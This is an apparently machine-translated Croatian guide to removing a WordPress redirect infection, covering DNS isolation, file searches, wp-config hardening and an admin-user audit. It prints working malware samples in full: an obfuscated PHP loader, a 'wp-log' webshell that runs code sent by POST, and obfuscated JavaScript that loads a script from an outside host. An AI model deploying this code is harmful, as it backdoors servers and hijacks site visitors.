Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress to je definitivno najkorištenija platforma CMS (Content Management System) za blogove i početne internetske trgovine (s modulom WooCommerce), što ga čini najizloženijim računalnim napadima (hakiranju). Jedna od najčešće korištenih operacija hakiranja ima za cilj preusmjeriti kompromitirano web mjesto na druge web stranice. Redirect WordPress Hack 2023 je relativno novi zlonamjerni softver koji ima učinak preusmjeravanja cijele web stranice na spam web stranice ili koji zauzvrat može zaraziti računala korisnika.

Ako se vaša stranica razvila na WordPress je preusmjeren na drugu stranicu, onda je najvjerojatnije žrtva već poznatog hakiranja preusmjeravanja.

U ovom vodiču pronaći ćete potrebne informacije i korisne savjete pomoću kojih možete devirusirati web stranicu zaraženu preusmjeravanjem WordPress Hack (Virus Redirect). Kroz komentare možete dobiti dodatne informacije ili zatražiti pomoć.

Kuprini

Otkrivanje virusa koji preusmjerava stranice WordPress

Nagli i neopravdani pad prometa na web stranici, pad broja narudžbi (u slučaju online trgovina) ili prihoda od oglašavanja prvi su znakovi da nešto nije u redu. Otkrivanje "Redirect WordPress Hack 2023” (Preusmjeravanje virusa) također se može učiniti “vizualno” kada otvorite web stranicu i budete preusmjereni na drugu web stranicu.

Iz iskustva, većina web zlonamjernog softvera kompatibilna je s internetskim preglednicima: Chrome, Firefox, Edge, Opera. Ako ste korisnik računala Mac, ti virusi zapravo nisu vidljivi u pregledniku Safari. Sigurnosni sustav od Safari tiho blokirati ove zlonamjerne skripte.

Što učiniti ako imate web stranicu zaraženu Redirect WordPress Hack

Nadam se da prvi korak neće biti panika ili brisanje web stranice. Čak ni zaražene ili virusne datoteke ne bi se trebale brisati na početku. Sadrže vrijedne informacije koje vam mogu pomoći da shvatite gdje je došlo do proboja sigurnosti i što je utjecalo na virus. Način rada.

Zatvorite web stranicu za javnost.

Kako zatvoriti virusnu web stranicu za posjetitelje? Najjednostavnije je koristiti DNS manager i izbrisati IP za "A" (naziv domene) ili definirati nepostojeći IP. Tako će posjetitelji web stranice biti zaštićeni od toga redirect WordPress hack što ih može dovesti do web stranica s virusima ili SPAM-om.

Ako koristite CloudFlare kao DNS upravitelj, prijavite se na račun i izbrišete DNS zapise "A” za naziv domene. Tako će domena zahvaćena virusom ostati bez IP-a, te joj se više neće moći pristupiti s interneta.

Kopirate IP web stranice i "usmjerite" ga tako da mu samo vi možete pristupiti. S vašeg računala.

Kako promijeniti pravi IP web stranice na računalima Windows?

Metoda se često koristi za blokiranje pristupa određenim web stranicama uređivanjem datoteke "hosts".

1. Vi otvarate Notepad ili drugi uređivač teksta (s pravima administrator) i uredite datoteku "hosts". Nalazi se u:

C:\Windows\System32\drivers\etc\hosts

2. U datoteci "hosts" dodajte "route" stvarnom IP-u vaše web stranice. IP izbrisan iznad iz DNS upravitelja.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Spremite datoteku i pristupite web stranici u pregledniku.

Ako se web stranica ne otvori i niste učinili ništa loše u datoteci "hosts", najvjerojatnije je u pitanju DNS predmemorija.

Za brisanje DNS predmemorije na operativnom sustavu Windows, otvoren Command Prompt, gdje izvodite naredbu:

ipconfig /flushdns

Kako promijeniti pravi IP web stranice na računalima Mac / MacKnjiga?

Za korisnike računala Mac nešto je jednostavnije promijeniti pravi IP web stranice.

1. Otvorite uslužni program Terminal.

2. Pokrenite naredbeni redak (za pokretanje je potrebna lozinka sustava):

sudo nano /etc/hosts

3. Isto kao i za računala Windows, dodajte pravi IP domene.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Spremite promjene. Ctrl+X (y).

Nakon što ste "usmjerili", vi ste jedina osoba s kojom možete pristupiti zaraženoj web stranici Redirect WordPress Hack.

Potpuna sigurnosna kopija web stranice – datoteke i baza podataka

Čak i ako je zaražen "redirect WordPress hack“, preporuka je napraviti generalni backup cijele web stranice. Datoteke i baza podataka. Možda biste također mogli spremiti lokalnu kopiju obiju datoteka iz public / public_html kao i baza podataka.

Identifikacija zaraženih datoteka i onih koje je izmijenio Redirect WordPress Hack 2023

Glavne ciljne datoteke WordPress ima index.php (u korijenu), header.php, index.php şi footer.php teme WordPress imovina. Ručno provjerite te datoteke i identificirajte zlonamjerni kod ili skriptu zlonamjernog softvera.

Godine 2023. virus “Redirect WordPress Hack” staviti index.php kod oblika:

(Ne preporučujem pokretanje ovih kodova!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekodirano, ovo zlonamjerna skripta to je u osnovi posljedica zaraženosti web stranice WordPress. Nije skripta iza zlonamjernog softvera, već skripta koja omogućuje preusmjeravanje zaražene web stranice. Ako dekodiramo gornju skriptu, dobivamo:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Za identifikaciju svih datoteka na poslužitelju koje sadrže ovaj kod, dobro je imati pristup SSH poslužitelju za pokretanje naredbenih linija za provjeru datoteka i upravljanje Linux.

Povezano: Kako saznati je li vaš blog zaražen ili ne, uz pomoć Google Search , (WordPress Virus)

Ispod su dvije naredbe koje su svakako korisne za prepoznavanje nedavno izmijenjenih datoteka i datoteka koje sadrže određeni kod (string).

Kako vidite na Linux PHP datoteke promijenjene u posljednja 24 sata ili u nekom drugom vremenskom okviru?

Narudžba "find” vrlo je jednostavan za korištenje i omogućuje prilagodbu za postavljanje vremenskog razdoblja, putanje pretraživanja i vrste datoteka.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

U izlazu ćete dobiti informacije o datumu i vremenu izmjene datoteke, dozvolama za pisanje/čitanje/izvršavanje (chmod) i kojoj grupi/korisniku pripada.

Ako želite provjeriti prije više dana, promijenite vrijednost "-mtime -1" ili koristite "-mmin -360” minuta (6 sati).

Kako tražiti kod (string) unutar PHP, Java datoteka?

Naredbeni redak "pronađi" koji vam omogućuje brzo pronalaženje svih PHP ili Java datoteka koje sadrže određeni kod je sljedeći:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Naredba će pretražiti i prikazati datoteke .php şi .js koji sadrži "uJjBRODYsU".

Uz pomoć gornje dvije naredbe vrlo ćete lako saznati koje su datoteke nedavno mijenjane i koje sadrže malware kod.

Uklanja zlonamjerni kod iz modificiranih datoteka bez ugrožavanja ispravnog koda. U mom scenariju zlonamjerni softver postavljen je prije otvaranja <head>.

Prilikom izvođenja prve naredbe "find" vrlo je moguće otkriti nove datoteke na poslužitelju, koje nisu vaše WordPress niti ste ga tamo postavili. Datoteke koje pripadaju vrsti virusa Redirect WordPress Hack.

U scenariju koji sam istraživao, datoteke oblika "wp-log-nOXdgD.php". To su "spawn" datoteke koje također sadrže malware kod koji koristi virus za preusmjeravanje.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Svrha datoteka tipa "wp-log-*” je širenje virusa za preusmjeravanje hakiranja na druge web stranice koje se nalaze na poslužitelju. To je malware kod tipa "webshell” sastavljen od a osnovni odjeljak (u kojem su definirane neke šifrirane varijable) i o izvedbeni dio putem kojih napadač pokušava učitati i izvršiti zlonamjerni kod na sustavu.

Ako postoji varijabla POST pod nazivom 'bh' i njegovu šifriranu vrijednost MD5 jednako je "8f1f964a4b4d8d1ac3f0386693d28d03", tada se pojavljuje skripta za pisanje šifriranog sadržaja base64 druge varijable pod nazivom 'b3' u privremenu datoteku, a zatim pokušava uključiti tu privremenu datoteku.

Ako postoji varijabla POST ili GET pod nazivom 'tick', skripta će odgovoriti vrijednošću MD5 niza "885".

Da biste identificirali sve datoteke na poslužitelju koje sadrže ovaj kod, odaberite niz koji je uobičajen, a zatim pokrenite naredbu “find” (slično ovom gore). Izbrišite sve datoteke koje sadrže ovaj zlonamjerni kod.

Sigurnosni propust iskorištava Redirect WordPress Hack

Najvjerojatnije ovaj virus za preusmjeravanje stiže putem iskorištavanje korisnika administracije WordPress ili identificiranjem a ranjivi dodatak koji omogućuje dodavanje korisnika s privilegijama administrator.

Za većinu web stranica izgrađenih na platformi WordPress moguće je uređivanje datoteka tema ili dodatakaiz administrativnog sučelja (Dashboard). Dakle, zlonamjerna osoba može dodati zlonamjerni kod u datoteke teme za generiranje gore prikazanih skripti.

Primjer takvog malware koda je sljedeći:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificiran u zaglavlju teme WordPress, odmah nakon otvaranja etikete <head>.

Prilično je teško dešifrirati ovaj JavaScript, ali očito je da postavlja upite drugoj web adresi odakle najvjerojatnije dohvaća druge skripte za stvaranje datoteka "wp-log-*” o kojem sam govorio gore.

Pronađite i izbrišite ovaj kod iz svih datoteka PHP pogođeni.

Koliko sam mogao reći, ovaj kod je bio dodano ručno od strane novog korisnika s administrativnim ovlastima.

Dakle, kako biste spriječili dodavanje zlonamjernog softvera s Nadzorne ploče, najbolje je onemogućiti opciju uređivanja WordPress Teme/dodaci s nadzorne ploče.

Uredite datoteku wp-config.php i dodajte retke:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Nakon ove promjene, nijedan korisnik WordPress više nećete moći uređivati datoteke s Nadzorne ploče.

Provjerite korisnike s ulogom Administrator

Ispod je SQL upit koji možete koristiti za traženje korisnika s ulogom administrator u platformi WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ovaj će upit vratiti sve korisnike u tablici wp_users koji je dodijelio ulogu administrator. Upit se također radi za tablicu wp_usermeta pretraživati u meta 'wp_capabilities', koji sadrži informacije o korisničkim ulogama.

Druga metoda je identificirati ih prema: Dashboard → Users → All Users → Administrator. Međutim, postoje postupci pomoću kojih se korisnik može sakriti na nadzornoj ploči. Dakle, najbolji način da vidite korisnike "Administrator"U WordPress je gornja SQL naredba.

U mom slučaju, identificirao sam u bazi podataka korisnika s imenom "wp-import-user". Prilično sugestivno.

Također odavde možete vidjeti datum i vrijeme kada je korisnik WordPress kreiran je. Korisnički ID je također vrlo važan jer pretražuje zapise poslužitelja. Na taj način možete vidjeti sve aktivnosti ovog korisnika.

Brisanje korisnika s ulogom administrator što onda ne poznaješ promijeniti lozinke svim administrativnim korisnicima. Urednik, autor, Administrator.

Promijenite lozinku korisnika SQL baze podataka zahvaćene web stranice.

Nakon poduzimanja ovih koraka, web mjesto se može ponovno pokrenuti za sve korisnike.

Međutim, imajte na umu da je ono što sam gore predstavio jedan od možda tisuća scenarija u kojima je web stranica zaražena Redirect WordPress Hack u 2023.

Ako je vaša web stranica zaražena i trebate pomoć ili ako imate pitanja, odjeljak za komentare je otvoren.